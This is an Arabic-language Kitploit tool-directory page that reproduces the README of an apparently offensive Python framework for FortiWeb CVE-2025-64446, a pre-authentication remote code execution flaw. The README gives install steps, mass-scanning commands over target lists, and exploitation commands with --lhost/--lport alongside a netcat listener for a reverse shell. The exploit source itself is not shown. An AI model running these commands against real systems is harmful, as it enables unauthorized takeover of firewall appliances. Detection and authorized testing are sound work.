Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
FortiWeb-cve-2025-64446-RCE-exploit — أداة بحث أمني لثغرة FortiWeb CVE-2025-64446. إطار استغلال آلي مع تسجيل متقدم ومقاييس في الوقت الفعلي وتصحيح أخطاء الوكيل وتقارير احترافية. يتضمن منطق إعادة المحاولة وتعدد الخيوط وإعدادات قابلة للتكوين. للاختبار الأمني المصرح به فقط. CVSS 9.8 حرج. | Kitploit
أدوات/GitHubGitHub/cerberusmrxi/fortiweb-cve-2025-64446-rce-exploit
ماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتأمن الويباختبار الاختراق
GitHubcerberusmrxi/fortiweb-cve-2025-64446-rce-exploit

FortiWeb-cve-2025-64446-RCE-exploit

أداة بحث أمني لثغرة FortiWeb CVE-2025-64446. إطار استغلال آلي مع تسجيل متقدم ومقاييس في الوقت الفعلي وتصحيح أخطاء الوكيل وتقارير احترافية. يتضمن منطق إعادة المحاولة وتعدد الخيوط وإعدادات قابلة للتكوين. للاختبار الأمني المصرح به فقط. CVSS 9.8 حرج.

عرض المستودع
14منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال RCE لثغرة CVE-2025-64446 في FortiWeb

Python License CVSS CVE Status Version

إطار عمل احترافي لأبحاث الأمن وتقييم الثغرات

التثبيت · البدء السريع · دليل الاستخدام · البنية · مرجع الأوامر · إخلاء المسؤولية


نظرة عامة

أداة أبحاث FortiWeb هي إطار تقييم مكتوب بلغة Python للكشف والتحليل المصرح به لثغرة CVE-2025-64446، وهي ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد قبل المصادقة تؤثر على أجهزة جدار حماية تطبيقات الويب FortiWeb.

الخاصيةالتفاصيل
المؤلفSudeepa Wanigarathna
CVECVE-2025-64446
CVSS9.8 (حرجة)
التصنيفتجاوز المصادقة + اجتياز المسار → رفع ملفات تعسفي → RCE
الإصدارات المتأثرةالإصدارات الأقدم من 7.6.7 / 7.8.7 / 8.0.2 (تحقق من النشرة الرسمية)
المعالجةالترقية إلى إصدار FortiWeb مصحح
اللغةPython 3.7+
نقطة الدخولexploit.py

القدرات الرئيسية

الوضعالخياراتالغرض
الكشف--detect-onlyمؤشرات الثغرة دون استغلال
الوضع الآمن / للقراءة فقط--safe-modeتخطي خطوات الاستغلال المعدِّلة
المسح الشامل--targets + --scan-modeتقييم متوازٍ لأهداف متعددة
الاستغلال--target + --lhostسلسلة استغلال مُتحكم بها في مختبرات مصرح بها فقط
التشغيل التجريبي--dry-runاختبار التدفق دون تطبيق التغييرات
التقارير--output-dirتقارير JSON + HTML للاختبار

ملخص الثغرة

الحقلالقيمة
معرّف CVECVE-2025-64446
درجة CVSS9.8 (حرجة)
الأثراختراق كامل للنظام عند نجاح الاستغلال
الإصلاحالترقية إلى 7.6.7 أو 7.8.7 أو 8.0.2 أو أحدث

تحقق دائمًا من الإصدارات المتأثرة/المصححة لدى Fortinet PSIRT قبل تحديد نطاق الاختبار.


📸 لقطات الشاشة

الاستخدامنتائج الفحص
DashboardScan Results
مخرجات HTML
Terminal Output

التثبيت

git clone https://github.com/CerberusMrXi/FortiWeb-cve-2025-64446-RCE-exploit
cd FortiWeb-cve-2025-64446-RCE-exploit

python3 -m venv venv
source venv/bin/activate          # Linux / macOS
# venv\Scripts\activate           # Windows

pip install -r requirements.txt
python3 exploit.py --help

التبعيات

الحزمةالدور
requests, urllib3عميل HTTP
rich, colorama, tqdmواجهة الطرفية وعرض التقدم
pyyamlتحميل config.yaml

اختيارية (للتطوير): pytest, black, flake8, mypy, python-dotenv — انظر requirements.txt.


البدء السريع

# Vulnerability check only (recommended first)
python3 exploit.py --target https://192.168.1.100:8443 --detect-only

# Safe / read-only checks
python3 exploit.py --target https://192.168.1.100:8443 --safe-mode

# Mass scanning
python3 exploit.py --targets targets.txt --scan-mode --threads 10

# Authorized exploitation (requires listener host)
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444

ملاحظة: يتطلب وضع الاستغلال --lhost. استخدم --detect-only أو --safe-mode عندما لا تنوي تشغيل السلسلة الكاملة.


دليل الاستخدام

وضع الكشف

python3 exploit.py --target https://192.168.1.100:8443 --detect-only
python3 exploit.py --target https://192.168.1.100:8443 --detect-only --verbose
python3 exploit.py --target https://192.168.1.100:8443 --safe-mode
python3 exploit.py --target https://192.168.1.100:8443 --detect-only --timeout 30

يقيم وضع الكشف إمكانية الوصول، ومؤشرات الإصدار، وتعرض الواجهات البرمجية، ومؤشرات اجتياز المسار، وإشارات تجاوز المصادقة، وإمكانية الوصول إلى نقطة رفع الملفات. يُصنف الخطر على أنه حرج / مرتفع / متوسط / منخفض بناءً على تلك المؤشرات.

المسح الشامل

cat > targets.txt << 'EOF'
https://192.168.1.100:8443
https://192.168.1.101:8443
https://192.168.1.102:8443
EOF

python3 exploit.py --targets targets.txt --scan-mode
python3 exploit.py --targets targets.txt --scan-mode --threads 20 --verbose
python3 exploit.py --targets targets.txt --scan-mode --output-dir ./reports

يشغّل ScannerManager عمال FortiWebScanner عبر تجمع خيوط، ويطبع جدولًا موجزًا بتقنية Rich، ويكتب scan_report.json / scan_report.html.

وضع الاستغلال (المختبرات المصرح بها فقط)

# Start your listener first (example)
nc -lvnp 4444

python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444 --proxy http://127.0.0.1:8080
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444 --dry-run
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444 --user-agent "Research/1.0"

ملف الإعدادات

# config.yaml
target: https://192.168.1.100:8443
lhost: 192.168.1.50
lport: 4444
timeout: 15
threads: 5
verify_ssl: false
verbose: true
proxy: http://127.0.0.1:8080
user_agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
output_dir: reports
log_dir: logs
detect_only: false
safe_mode: false
dry_run: false
python3 exploit.py --config config.yaml
python3 exploit.py --config config.yaml --target https://10.0.0.1:8443 --lport 9999

تتجاوز وسائط CLI القيم المحمّلة من YAML.


البنية

exploit.py
├── ExploitConfig / ExploitResult / RequestMetrics   # dataclasses
├── LogManager                                       # exploit.log, errors.log, requests.log
├── Banner / StatusDisplay                           # Rich / colorama UI
├── FortiWebScanner                                  # detect-only checks (no exploit chain)
├── ScannerManager                                   # threaded multi-target scans + reports
├── FortiWebExploit                                  # single-target detect / exploit workflow
└── main()                                           # argparse + mode dispatch
المكوّنالمسؤولية
FortiWebScannerفحوصات إمكانية الوصول والإصدار ومؤشرات CVE
ScannerManagerمسوحات متوازية، وتجميع JSON/HTML، وجدول موجز
FortiWebExploitجلسة مدفوعة بالإعدادات، وإعادة محاولة، ومقاييس، وتقارير، ومسار استغلال اختياري
LogManagerتسجيل ملفات منظم + وحدة تحكم ملونة

التدفق العام لهدف واحد:

  1. إعداد الشعار / التسجيل
  2. فحص إمكانية الوصول والإصدار
  3. فحوصات المؤشرات (أو السلسلة الكاملة عندما لا يكون وضع الكشف/الآمن مفعّلًا)
  4. تقرير JSON + HTML داخل reports/
  5. التنظيف عند الاقتضاء

الميزات

الكشف

  • فحوصات مؤشرات اجتياز المسار ضد مسارات واجهة الإدارة البرمجية
  • فحوصات إشارات تجاوز المصادقة
  • فحص إصدار FortiWeb عبر نقاط الحالة/الإصدار الشائعة
  • رسم خريطة تعرض نقاط الواجهة البرمجية
  • فحوصات إمكانية الوصول إلى نقطة رفع الملفات
  • تقييم الخطر من المؤشرات المجمعة

التقارير والمراقبة

تنزيل الأداة